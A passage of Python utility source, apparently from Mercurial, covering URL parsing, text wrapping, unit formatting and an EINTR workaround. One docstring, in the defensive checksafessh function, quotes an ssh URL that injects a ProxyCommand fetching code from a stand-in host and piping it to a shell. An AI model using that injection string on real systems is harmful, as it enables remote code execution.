2234 2234
2235 2235 force exact matches ('literal:' prefix)
2236 2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 2237 ('literal', 're:foobar', [False, True])
2238 2238
2239 2239 unknown prefixes are ignored and treated as literals
2240 2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 2241 ('literal', 'foo:bar', [False, False, True])
2242 2242
2243 2243 case insensitive regex matches
2244 2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 2245 ('re', 'A.+b', [False, False, True])
2246 2246
2247 2247 case insensitive literal matches
2248 2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 2249 ('literal', 'ABCDEFG', [False, False, True])
2250 2250 """
2251 2251 if pattern.startswith('re:'):
2252 2252 pattern = pattern[3:]
2253 2253 try:
2254 2254 flags = 0
2255 2255 if not casesensitive:
2256 2256 flags = remod.I
2257 2257 regex = remod.compile(pattern, flags)
2258 2258 except remod.error as e:
2259 2259 raise error.ParseError(_('invalid regular expression: %s')
2260 2260 % e)
2261 2261 return 're', pattern, regex.search
2262 2262 elif pattern.startswith('literal:'):
2263 2263 pattern = pattern[8:]
2264 2264
2265 2265 match = pattern.__eq__
2266 2266
2267 2267 if not casesensitive:
2268 2268 ipat = encoding.lower(pattern)
2269 2269 match = lambda s: ipat == encoding.lower(s)
2270 2270 return 'literal', pattern, match
2271 2271
2272 2272 def shortuser(user):
2273 2273 """Return a short representation of a user name or email address."""
2274 2274 f = user.find('@')
2275 2275 if f >= 0:
2276 2276 user = user[:f]
2277 2277 f = user.find('<')
2278 2278 if f >= 0:
2279 2279 user = user[f + 1:]
2280 2280 f = user.find(' ')
2281 2281 if f >= 0:
2282 2282 user = user[:f]
2283 2283 f = user.find('.')
2284 2284 if f >= 0:
2285 2285 user = user[:f]
2286 2286 return user
2287 2287
2288 2288 def emailuser(user):
2289 2289 """Return the user portion of an email address."""
2290 2290 f = user.find('@')
2291 2291 if f >= 0:
2292 2292 user = user[:f]
2293 2293 f = user.find('<')
2294 2294 if f >= 0:
2295 2295 user = user[f + 1:]
2296 2296 return user
2297 2297
2298 2298 def email(author):
2299 2299 '''get email of author.'''
2300 2300 r = author.find('>')
2301 2301 if r == -1:
2302 2302 r = None
2303 2303 return author[author.find('<') + 1:r]
2304 2304
2305 2305 def ellipsis(text, maxlength=400):
2306 2306 """Trim string to at most maxlength (default: 400) columns in display."""
2307 2307 return encoding.trim(text, maxlength, ellipsis='...')
2308 2308
2309 2309 def unitcountfn(*unittable):
2310 2310 '''return a function that renders a readable count of some quantity'''
2311 2311
2312 2312 def go(count):
2313 2313 for multiplier, divisor, format in unittable:
2314 2314 if abs(count) >= divisor * multiplier:
2315 2315 return format % (count / float(divisor))
2316 2316 return unittable[-1][2] % count
2317 2317
2318 2318 return go
2319 2319
2320 2320 def processlinerange(fromline, toline):
2321 2321 """Check that linerange <fromline>:<toline> makes sense and return a
2322 2322 0-based range.
2323 2323
2324 2324 >>> processlinerange(10, 20)
2325 2325 (9, 20)
2326 2326 >>> processlinerange(2, 1)
2327 2327 Traceback (most recent call last):
2328 2328 ...
2329 2329 ParseError: line range must be positive
2330 2330 >>> processlinerange(0, 5)
2331 2331 Traceback (most recent call last):
2332 2332 ...
2333 2333 ParseError: fromline must be strictly positive
2334 2334 """
2335 2335 if toline - fromline < 0:
2336 2336 raise error.ParseError(_("line range must be positive"))
2337 2337 if fromline < 1:
2338 2338 raise error.ParseError(_("fromline must be strictly positive"))
2339 2339 return fromline - 1, toline
2340 2340
2341 2341 bytecount = unitcountfn(
2342 2342 (100, 1 << 30, _('%.0f GB')),
2343 2343 (10, 1 << 30, _('%.1f GB')),
2344 2344 (1, 1 << 30, _('%.2f GB')),
2345 2345 (100, 1 << 20, _('%.0f MB')),
2346 2346 (10, 1 << 20, _('%.1f MB')),
2347 2347 (1, 1 << 20, _('%.2f MB')),
2348 2348 (100, 1 << 10, _('%.0f KB')),
2349 2349 (10, 1 << 10, _('%.1f KB')),
2350 2350 (1, 1 << 10, _('%.2f KB')),
2351 2351 (1, 1, _('%.0f bytes')),
2352 2352 )
2353 2353
2354 2354 # Matches a single EOL which can either be a CRLF where repeated CR
2355 2355 # are removed or a LF. We do not care about old Macintosh files, so a
2356 2356 # stray CR is an error.
2357 2357 _eolre = remod.compile(br'\r*\n')
2358 2358
2359 2359 def tolf(s):
2360 2360 return _eolre.sub('\n', s)
2361 2361
2362 2362 def tocrlf(s):
2363 2363 return _eolre.sub('\r\n', s)
2364 2364
2365 2365 if pycompat.oslinesep == '\r\n':
2366 2366 tonativeeol = tocrlf
2367 2367 fromnativeeol = tolf
2368 2368 else:
2369 2369 tonativeeol = pycompat.identity
2370 2370 fromnativeeol = pycompat.identity
2371 2371
2372 2372 def escapestr(s):
2373 2373 # call underlying function of s.encode('string_escape') directly for
2374 2374 # Python 3 compatibility
2375 2375 return codecs.escape_encode(s)[0]
2376 2376
2377 2377 def unescapestr(s):
2378 2378 return codecs.escape_decode(s)[0]
2379 2379
2380 2380 def forcebytestr(obj):
2381 2381 """Portably format an arbitrary object (e.g. exception) into a byte
2382 2382 string."""
2383 2383 try:
2384 2384 return pycompat.bytestr(obj)
2385 2385 except UnicodeEncodeError:
2386 2386 # non-ascii string, may be lossy
2387 2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388 2388
2389 2389 def uirepr(s):
2390 2390 # Avoid double backslash in Windows path repr()
2391 2391 return repr(s).replace('\\\\', '\\')
2392 2392
2393 2393 # delay import of textwrap
2394 2394 def MBTextWrapper(**kwargs):
2395 2395 class tw(textwrap.TextWrapper):
2396 2396 """
2397 2397 Extend TextWrapper for width-awareness.
2398 2398
2399 2399 Neither number of 'bytes' in any encoding nor 'characters' is
2400 2400 appropriate to calculate terminal columns for specified string.
2401 2401
2402 2402 Original TextWrapper implementation uses built-in 'len()' directly,
2403 2403 so overriding is needed to use width information of each characters.
2404 2404
2405 2405 In addition, characters classified into 'ambiguous' width are
2406 2406 treated as wide in East Asian area, but as narrow in other.
2407 2407
2408 2408 This requires use decision to determine width of such characters.
2409 2409 """
2410 2410 def _cutdown(self, ucstr, space_left):
2411 2411 l = 0
2412 2412 colwidth = encoding.ucolwidth
2413 2413 for i in xrange(len(ucstr)):
2414 2414 l += colwidth(ucstr[i])
2415 2415 if space_left < l:
2416 2416 return (ucstr[:i], ucstr[i:])
2417 2417 return ucstr, ''
2418 2418
2419 2419 # overriding of base class
2420 2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 2421 space_left = max(width - cur_len, 1)
2422 2422
2423 2423 if self.break_long_words:
2424 2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 2425 cur_line.append(cut)
2426 2426 reversed_chunks[-1] = res
2427 2427 elif not cur_line:
2428 2428 cur_line.append(reversed_chunks.pop())
2429 2429
2430 2430 # this overriding code is imported from TextWrapper of Python 2.6
2431 2431 # to calculate columns of string by 'encoding.ucolwidth()'
2432 2432 def _wrap_chunks(self, chunks):
2433 2433 colwidth = encoding.ucolwidth
2434 2434
2435 2435 lines = []
2436 2436 if self.width <= 0:
2437 2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438 2438
2439 2439 # Arrange in reverse order so items can be efficiently popped
2440 2440 # from a stack of chucks.
2441 2441 chunks.reverse()
2442 2442
2443 2443 while chunks:
2444 2444
2445 2445 # Start the list of chunks that will make up the current line.
2446 2446 # cur_len is just the length of all the chunks in cur_line.
2447 2447 cur_line = []
2448 2448 cur_len = 0
2449 2449
2450 2450 # Figure out which static string will prefix this line.
2451 2451 if lines:
2452 2452 indent = self.subsequent_indent
2453 2453 else:
2454 2454 indent = self.initial_indent
2455 2455
2456 2456 # Maximum width for this line.
2457 2457 width = self.width - len(indent)
2458 2458
2459 2459 # First chunk on line is whitespace -- drop it, unless this
2460 2460 # is the very beginning of the text (i.e. no lines started yet).
2461 2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 2462 del chunks[-1]
2463 2463
2464 2464 while chunks:
2465 2465 l = colwidth(chunks[-1])
2466 2466
2467 2467 # Can at least squeeze this chunk onto the current line.
2468 2468 if cur_len + l <= width:
2469 2469 cur_line.append(chunks.pop())
2470 2470 cur_len += l
2471 2471
2472 2472 # Nope, this line is full.
2473 2473 else:
2474 2474 break
2475 2475
2476 2476 # The current line is full, and the next chunk is too big to
2477 2477 # fit on *any* line (not just this one).
2478 2478 if chunks and colwidth(chunks[-1]) > width:
2479 2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2480 2480
2481 2481 # If the last chunk on this line is all whitespace, drop it.
2482 2482 if (self.drop_whitespace and
2483 2483 cur_line and cur_line[-1].strip() == r''):
2484 2484 del cur_line[-1]
2485 2485
2486 2486 # Convert current line back to a string and store it in list
2487 2487 # of all lines (return value).
2488 2488 if cur_line:
2489 2489 lines.append(indent + r''.join(cur_line))
2490 2490
2491 2491 return lines
2492 2492
2493 2493 global MBTextWrapper
2494 2494 MBTextWrapper = tw
2495 2495 return tw(**kwargs)
2496 2496
2497 2497 def wrap(line, width, initindent='', hangindent=''):
2498 2498 maxindent = max(len(hangindent), len(initindent))
2499 2499 if width <= maxindent:
2500 2500 # adjust for weird terminal size
2501 2501 width = max(78, maxindent + 1)
2502 2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 2503 pycompat.sysstr(encoding.encodingmode))
2504 2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 2505 pycompat.sysstr(encoding.encodingmode))
2506 2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 2507 pycompat.sysstr(encoding.encodingmode))
2508 2508 wrapper = MBTextWrapper(width=width,
2509 2509 initial_indent=initindent,
2510 2510 subsequent_indent=hangindent)
2511 2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512 2512
2513 2513 if (pyplatform.python_implementation() == 'CPython' and
2514 2514 sys.version_info < (3, 0)):
2515 2515 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2516 # correctly. The following table shows what CPython version (and functions)
2517 2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2518 #
2519 2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2520 # --------------------------------------------------
2521 2521 # fp.__iter__ | buggy | buggy | okay
2522 2522 # fp.read* | buggy | okay [1] | okay
2523 2523 #
2524 2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2525 #
2526 2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2528 #
2529 2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2532 # fp.__iter__ but not other fp.read* methods.
2533 2533 #
2534 2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2538 # to minimize the performance impact.
2539 2539 if sys.version_info >= (2, 7, 4):
2540 2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2541 def _safeiterfile(fp):
2542 2542 return iter(fp.readline, '')
2543 2543 else:
2544 2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2545 # note: this may block longer than necessary because of bufsize.
2546 2546 def _safeiterfile(fp, bufsize=4096):
2547 2547 fd = fp.fileno()
2548 2548 line = ''
2549 2549 while True:
2550 2550 try:
2551 2551 buf = os.read(fd, bufsize)
2552 2552 except OSError as ex:
2553 2553 # os.read only raises EINTR before any data is read
2554 2554 if ex.errno == errno.EINTR:
2555 2555 continue
2556 2556 else:
2557 2557 raise
2558 2558 line += buf
2559 2559 if '\n' in buf:
2560 2560 splitted = line.splitlines(True)
2561 2561 line = ''
2562 2562 for l in splitted:
2563 2563 if l[-1] == '\n':
2564 2564 yield l
2565 2565 else:
2566 2566 line = l
2567 2567 if not buf:
2568 2568 break
2569 2569 if line:
2570 2570 yield line
2571 2571
2572 2572 def iterfile(fp):
2573 2573 fastpath = True
2574 2574 if type(fp) is file:
2575 2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2576 if fastpath:
2577 2577 return fp
2578 2578 else:
2579 2579 return _safeiterfile(fp)
2580 2580 else:
2581 2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2582 def iterfile(fp):
2583 2583 return fp
2584 2584
2585 2585 def iterlines(iterator):
2586 2586 for chunk in iterator:
2587 2587 for line in chunk.splitlines():
2588 2588 yield line
2589 2589
2590 2590 def expandpath(path):
2591 2591 return os.path.expanduser(os.path.expandvars(path))
2592 2592
2593 2593 def hgcmd():
2594 2594 """Return the command used to execute current hg
2595 2595
2596 2596 This is different from hgexecutable() because on Windows we want
2597 2597 to avoid things opening new shell windows like batch files, so we
2598 2598 get either the python call or current executable.
2599 2599 """
2600 2600 if mainfrozen():
2601 2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 2602 # Env variable set by py2app
2603 2603 return [encoding.environ['EXECUTABLEPATH']]
2604 2604 else:
2605 2605 return [pycompat.sysexecutable]
2606 2606 return gethgcmd()
2607 2607
2608 2608 def rundetached(args, condfn):
2609 2609 """Execute the argument list in a detached process.
2610 2610
2611 2611 condfn is a callable which is called repeatedly and should return
2612 2612 True once the child process is known to have started successfully.
2613 2613 At this point, the child process PID is returned. If the child
2614 2614 process fails to start or finishes before condfn() evaluates to
2615 2615 True, return -1.
2616 2616 """
2617 2617 # Windows case is easier because the child process is either
2618 2618 # successfully starting and validating the condition or exiting
2619 2619 # on failure. We just poll on its PID. On Unix, if the child
2620 2620 # process fails to start, it will be left in a zombie state until
2621 2621 # the parent wait on it, which we cannot do since we expect a long
2622 2622 # running process on success. Instead we listen for SIGCHLD telling
2623 2623 # us our child process terminated.
2624 2624 terminated = set()
2625 2625 def handler(signum, frame):
2626 2626 terminated.add(os.wait())
2627 2627 prevhandler = None
2628 2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 2629 if SIGCHLD is not None:
2630 2630 prevhandler = signal.signal(SIGCHLD, handler)
2631 2631 try:
2632 2632 pid = spawndetached(args)
2633 2633 while not condfn():
2634 2634 if ((pid in terminated or not testpid(pid))
2635 2635 and not condfn()):
2636 2636 return -1
2637 2637 time.sleep(0.1)
2638 2638 return pid
2639 2639 finally:
2640 2640 if prevhandler is not None:
2641 2641 signal.signal(signal.SIGCHLD, prevhandler)
2642 2642
2643 2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 2644 """Return the result of interpolating items in the mapping into string s.
2645 2645
2646 2646 prefix is a single character string, or a two character string with
2647 2647 a backslash as the first character if the prefix needs to be escaped in
2648 2648 a regular expression.
2649 2649
2650 2650 fn is an optional function that will be applied to the replacement text
2651 2651 just before replacement.
2652 2652
2653 2653 escape_prefix is an optional flag that allows using doubled prefix for
2654 2654 its escaping.
2655 2655 """
2656 2656 fn = fn or (lambda s: s)
2657 2657 patterns = '|'.join(mapping.keys())
2658 2658 if escape_prefix:
2659 2659 patterns += '|' + prefix
2660 2660 if len(prefix) > 1:
2661 2661 prefix_char = prefix[1:]
2662 2662 else:
2663 2663 prefix_char = prefix
2664 2664 mapping[prefix_char] = prefix_char
2665 2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2667
2668 2668 def getport(port):
2669 2669 """Return the port for a given network service.
2670 2670
2671 2671 If port is an integer, it's returned as is. If it's a string, it's
2672 2672 looked up using socket.getservbyname(). If there's no matching
2673 2673 service, error.Abort is raised.
2674 2674 """
2675 2675 try:
2676 2676 return int(port)
2677 2677 except ValueError:
2678 2678 pass
2679 2679
2680 2680 try:
2681 2681 return socket.getservbyname(port)
2682 2682 except socket.error:
2683 2683 raise Abort(_("no port number associated with service '%s'") % port)
2684 2684
2685 2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 2687 'never': False}
2688 2688
2689 2689 def parsebool(s):
2690 2690 """Parse s into a boolean.
2691 2691
2692 2692 If s is not a valid boolean, returns None.
2693 2693 """
2694 2694 return _booleans.get(s.lower(), None)
2695 2695
2696 2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 2697 for a in string.hexdigits for b in string.hexdigits)
2698 2698
2699 2699 class url(object):
2700 2700 r"""Reliable URL parser.
2701 2701
2702 2702 This parses URLs and provides attributes for the following
2703 2703 components:
2704 2704
2705 2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2706
2707 2707 Missing components are set to None. The only exception is
2708 2708 fragment, which is set to '' if present but empty.
2709 2709
2710 2710 If parsefragment is False, fragment is included in query. If
2711 2711 parsequery is False, query is included in path. If both are
2712 2712 False, both fragment and query are included in path.
2713 2713
2714 2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2715
2716 2716 Note that for backward compatibility reasons, bundle URLs do not
2717 2717 take host names. That means 'bundle://../' has a path of '../'.
2718 2718
2719 2719 Examples:
2720 2720
2721 2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2725 >>> url(b'file:///home/joe/repo')
2726 2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 2727 >>> url(b'file:///c:/temp/foo/')
2728 2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2729 >>> url(b'bundle:foo')
2730 2730 <url scheme: 'bundle', path: 'foo'>
2731 2731 >>> url(b'bundle://../foo')
2732 2732 <url scheme: 'bundle', path: '../foo'>
2733 2733 >>> url(br'c:\foo\bar')
2734 2734 <url path: 'c:\\foo\\bar'>
2735 2735 >>> url(br'\\blah\blah\blah')
2736 2736 <url path: '\\\\blah\\blah\\blah'>
2737 2737 >>> url(br'\\blah\blah\blah#baz')
2738 2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2739 >>> url(br'file:///C:\users\me')
2740 2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2741
2742 2742 Authentication credentials:
2743 2743
2744 2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2746 >>> url(b'ssh://joe@x/repo')
2747 2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2748
2749 2749 Query strings and fragments:
2750 2750
2751 2751 >>> url(b'http://host/a?b#c')
2752 2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2755
2756 2756 Empty path:
2757 2757
2758 2758 >>> url(b'')
2759 2759 <url path: ''>
2760 2760 >>> url(b'#a')
2761 2761 <url path: '', fragment: 'a'>
2762 2762 >>> url(b'http://host/')
2763 2763 <url scheme: 'http', host: 'host', path: ''>
2764 2764 >>> url(b'http://host/#a')
2765 2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2766
2767 2767 Only scheme:
2768 2768
2769 2769 >>> url(b'http:')
2770 2770 <url scheme: 'http'>
2771 2771 """
2772 2772
2773 2773 _safechars = "!~*'()+"
2774 2774 _safepchars = "/!~*'()+:\\"
2775 2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2776
2777 2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2778 # We slowly chomp away at path until we have only the path left
2779 2779 self.scheme = self.user = self.passwd = self.host = None
2780 2780 self.port = self.path = self.query = self.fragment = None
2781 2781 self._localpath = True
2782 2782 self._hostport = ''
2783 2783 self._origpath = path
2784 2784
2785 2785 if parsefragment and '#' in path:
2786 2786 path, self.fragment = path.split('#', 1)
2787 2787
2788 2788 # special case for Windows drive letters and UNC paths
2789 2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 # For compatibility reasons, we can't handle bundle paths as
2794 2794 # normal URLS
2795 2795 if path.startswith('bundle:'):
2796 2796 self.scheme = 'bundle'
2797 2797 path = path[7:]
2798 2798 if path.startswith('//'):
2799 2799 path = path[2:]
2800 2800 self.path = path
2801 2801 return
2802 2802
2803 2803 if self._matchscheme(path):
2804 2804 parts = path.split(':', 1)
2805 2805 if parts[0]:
2806 2806 self.scheme, path = parts
2807 2807 self._localpath = False
2808 2808
2809 2809 if not path:
2810 2810 path = None
2811 2811 if self._localpath:
2812 2812 self.path = ''
2813 2813 return
2814 2814 else:
2815 2815 if self._localpath:
2816 2816 self.path = path
2817 2817 return
2818 2818
2819 2819 if parsequery and '?' in path:
2820 2820 path, self.query = path.split('?', 1)
2821 2821 if not path:
2822 2822 path = None
2823 2823 if not self.query:
2824 2824 self.query = None
2825 2825
2826 2826 # // is required to specify a host/authority
2827 2827 if path and path.startswith('//'):
2828 2828 parts = path[2:].split('/', 1)
2829 2829 if len(parts) > 1:
2830 2830 self.host, path = parts
2831 2831 else:
2832 2832 self.host = parts[0]
2833 2833 path = None
2834 2834 if not self.host:
2835 2835 self.host = None
2836 2836 # path of file:///d is /d
2837 2837 # path of file:///d:/ is d:/, not /d:/
2838 2838 if path and not hasdriveletter(path):
2839 2839 path = '/' + path
2840 2840
2841 2841 if self.host and '@' in self.host:
2842 2842 self.user, self.host = self.host.rsplit('@', 1)
2843 2843 if ':' in self.user:
2844 2844 self.user, self.passwd = self.user.split(':', 1)
2845 2845 if not self.host:
2846 2846 self.host = None
2847 2847
2848 2848 # Don't split on colons in IPv6 addresses without ports
2849 2849 if (self.host and ':' in self.host and
2850 2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2851 self._hostport = self.host
2852 2852 self.host, self.port = self.host.rsplit(':', 1)
2853 2853 if not self.host:
2854 2854 self.host = None
2855 2855
2856 2856 if (self.host and self.scheme == 'file' and
2857 2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2859
2860 2860 self.path = path
2861 2861
2862 2862 # leave the query string escaped
2863 2863 for a in ('user', 'passwd', 'host', 'port',
2864 2864 'path', 'fragment'):
2865 2865 v = getattr(self, a)
2866 2866 if v is not None:
2867 2867 setattr(self, a, urlreq.unquote(v))
2868 2868
2869 2869 @encoding.strmethod
2870 2870 def __repr__(self):
2871 2871 attrs = []
2872 2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2873 'query', 'fragment'):
2874 2874 v = getattr(self, a)
2875 2875 if v is not None:
2876 2876 attrs.append('%s: %r' % (a, v))
2877 2877 return '<url %s>' % ', '.join(attrs)
2878 2878
2879 2879 def __bytes__(self):
2880 2880 r"""Join the URL's components back into a URL string.
2881 2881
2882 2882 Examples:
2883 2883
2884 2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2892 >>> bytes(url(b'http://localhost:80//'))
2893 2893 'http://localhost:80//'
2894 2894 >>> bytes(url(b'http://localhost:80/'))
2895 2895 'http://localhost:80/'
2896 2896 >>> bytes(url(b'http://localhost:80'))
2897 2897 'http://localhost:80/'
2898 2898 >>> bytes(url(b'bundle:foo'))
2899 2899 'bundle:foo'
2900 2900 >>> bytes(url(b'bundle://../foo'))
2901 2901 'bundle:../foo'
2902 2902 >>> bytes(url(b'path'))
2903 2903 'path'
2904 2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2905 'file:///tmp/foo/bar'
2906 2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2907 'file:///c:/tmp/foo/bar'
2908 2908 >>> print(url(br'bundle:foo\bar'))
2909 2909 bundle:foo\bar
2910 2910 >>> print(url(br'file:///D:\data\hg'))
2911 2911 file:///D:\data\hg
2912 2912 """
2913 2913 if self._localpath:
2914 2914 s = self.path
2915 2915 if self.scheme == 'bundle':
2916 2916 s = 'bundle:' + s
2917 2917 if self.fragment:
2918 2918 s += '#' + self.fragment
2919 2919 return s
2920 2920
2921 2921 s = self.scheme + ':'
2922 2922 if self.user or self.passwd or self.host:
2923 2923 s += '//'
2924 2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2925 or hasdriveletter(self.path)):
2926 2926 s += '//'
2927 2927 if hasdriveletter(self.path):
2928 2928 s += '/'
2929 2929 if self.user:
2930 2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 2931 if self.passwd:
2932 2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2933 if self.user or self.passwd:
2934 2934 s += '@'
2935 2935 if self.host:
2936 2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2937 s += urlreq.quote(self.host)
2938 2938 else:
2939 2939 s += self.host
2940 2940 if self.port:
2941 2941 s += ':' + urlreq.quote(self.port)
2942 2942 if self.host:
2943 2943 s += '/'
2944 2944 if self.path:
2945 2945 # TODO: similar to the query string, we should not unescape the
2946 2946 # path when we store it, the path might contain '%2f' = '/',
2947 2947 # which we should *not* escape.
2948 2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2949 if self.query:
2950 2950 # we store the query in escaped form.
2951 2951 s += '?' + self.query
2952 2952 if self.fragment is not None:
2953 2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2954 return s
2955 2955
2956 2956 __str__ = encoding.strmethod(__bytes__)
2957 2957
2958 2958 def authinfo(self):
2959 2959 user, passwd = self.user, self.passwd
2960 2960 try:
2961 2961 self.user, self.passwd = None, None
2962 2962 s = bytes(self)
2963 2963 finally:
2964 2964 self.user, self.passwd = user, passwd
2965 2965 if not self.user:
2966 2966 return (s, None)
2967 2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 2968 # URIs must not contain credentials. The host is passed in the
2969 2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 2970 # a password.
2971 2971 return (s, (None, (s, self.host),
2972 2972 self.user, self.passwd or ''))
2973 2973
2974 2974 def isabs(self):
2975 2975 if self.scheme and self.scheme != 'file':
2976 2976 return True # remote URL
2977 2977 if hasdriveletter(self.path):
2978 2978 return True # absolute for our purposes - can't be joined()
2979 2979 if self.path.startswith(br'\\'):
2980 2980 return True # Windows UNC path
2981 2981 if self.path.startswith('/'):
2982 2982 return True # POSIX-style
2983 2983 return False
2984 2984
2985 2985 def localpath(self):
2986 2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 2987 path = self.path or '/'
2988 2988 # For Windows, we need to promote hosts containing drive
2989 2989 # letters to paths with drive letters.
2990 2990 if hasdriveletter(self._hostport):
2991 2991 path = self._hostport + '/' + self.path
2992 2992 elif (self.host is not None and self.path
2993 2993 and not hasdriveletter(path)):
2994 2994 path = '/' + path
2995 2995 return path
2996 2996 return self._origpath
2997 2997
2998 2998 def islocal(self):
2999 2999 '''whether localpath will return something that posixfile can open'''
3000 3000 return (not self.scheme or self.scheme == 'file'
3001 3001 or self.scheme == 'bundle')
3002 3002
3003 3003 def hasscheme(path):
3004 3004 return bool(url(path).scheme)
3005 3005
3006 3006 def hasdriveletter(path):
3007 3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3008 3008
3009 3009 def urllocalpath(path):
3010 3010 return url(path, parsequery=False, parsefragment=False).localpath()
3011 3011
3012 3012 def checksafessh(path):
3013 3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014 3014
3015 3015 This is a sanity check for ssh urls. ssh will parse the first item as
3016 3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 3017 Let's prevent these potentially exploited urls entirely and warn the
3018 3018 user.
3019 3019
3020 3020 Raises an error.Abort when the url is unsafe.
3021 3021 """
3022 3022 path = urlreq.unquote(path)
3023 3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 3024 raise error.Abort(_('potentially unsafe url: %r') %
3025 3025 (path,))
3026 3026
3027 3027 def hidepassword(u):
3028 3028 '''hide user credential in a url string'''
3029 3029 u = url(u)
3030 3030 if u.passwd:
3031 3031 u.passwd = '***'
3032 3032 return bytes(u)
3033 3033
3034 3034 def removeauth(u):
3035 3035 '''remove all authentication information from a url string'''
3036 3036 u = url(u)
3037 3037 u.user = u.passwd = None
3038 3038 return str(u)
3039 3039
3040 3040 timecount = unitcountfn(
3041 3041 (1, 1e3, _('%.0f s')),
3042 3042 (100, 1, _('%.1f s')),
3043 3043 (10, 1, _('%.2f s')),
3044 3044 (1, 1, _('%.3f s')),
3045 3045 (100, 0.001, _('%.1f ms')),
3046 3046 (10, 0.001, _('%.2f ms')),
3047 3047 (1, 0.001, _('%.3f ms')),
